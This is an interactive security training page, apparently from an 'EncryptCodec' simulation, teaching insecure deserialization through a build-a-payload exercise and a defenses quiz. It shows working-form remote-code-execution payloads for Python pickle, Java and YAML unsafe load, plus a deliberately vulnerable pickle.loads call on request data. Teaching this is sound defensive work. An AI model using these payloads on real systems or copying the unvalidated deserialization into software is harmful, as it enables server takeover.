EncryptCodecencryptcodec
Simulations/Insecure Deserialization

Insecure Deserialization

Advanced

Exploit insecure deserialization by sending a crafted serialized object that executes arbitrary commands on the server, then select the correct defenses.

Progress:
1
Craft Malicious Payload
2
Prevent Deserialization Attacks
Serialized Payload Builder
The server endpoint POST /api/import accepts serialized objects and deserializes them without validation.
Normal user object
{"username": "alice", "role": "user"}
Python pickle RCERCE
import pickle, os class Exploit: def __reduce__(self): return (os.system, ('id',)) pickle.dumps(Exploit())
Java deserialization RCERCE
ObjectInputStream ois = new ObjectInputStream(input); // Crafted gadget chain: Runtime.getRuntime().exec("id"); ois.readObject(); // triggers command execution
YAML unsafe loadRCE
!!python/object/apply:os.system args: ['id']
server logs — app.example.com
Waiting for payload...

The server runs:
data = pickle.loads(request.body)
# No validation, no type checking
# Any object structure is accepted

Challenges

1
Craft Malicious Payload
Select and submit a serialized payload that executes a system command on the server.
hints
2
Prevent Deserialization Attacks
Select at least 3 correct defenses to prevent insecure deserialization.
hints
How to fix insecure deserialization
Never deserialize untrusted input

Frequently Asked Questions